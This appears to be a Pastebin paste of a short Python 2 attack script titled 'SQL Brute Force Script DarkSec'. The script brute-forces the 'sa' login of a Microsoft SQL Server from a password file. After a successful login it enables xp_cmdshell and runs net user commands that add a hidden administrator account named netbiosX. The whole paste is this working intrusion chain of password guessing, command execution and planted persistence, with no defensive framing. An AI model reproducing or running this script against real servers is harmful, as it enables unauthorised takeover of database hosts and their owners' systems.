Advertisement
3l1t3Sn1P3r

SQL Brute Force Script DarkSec

Jul 12th, 2015
260
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.83 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import _mssql
  4.  
  5. # mssql = _mssql.connect('ip', 'username', 'password')
  6. # mssql.execute_query()
  7.  
  8. passwords = file("pass.txt", "r")
  9. ip = "192.168.200.128"
  10.  
  11. for password in passwords:
  12. password = password.rstrip()
  13. try:
  14. mssql = _mssql.connect(ip, "sa", password)
  15.  
  16. print "[*] Successful login with username 'sa' and password: " + password
  17. print "[*] Enabling 'xp_cmdshell'"
  18. mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
  19. mssql.execute_query("RECONFIGURE;")
  20.  
  21. print "[*] Adding Administrative user"
  22. mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
  23. mssql.close()
  24.  
  25. print "[*] Success!"
  26. break
  27.  
  28. except:
  29. print "[!] Failed login for username 'sa' and password: " + password
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement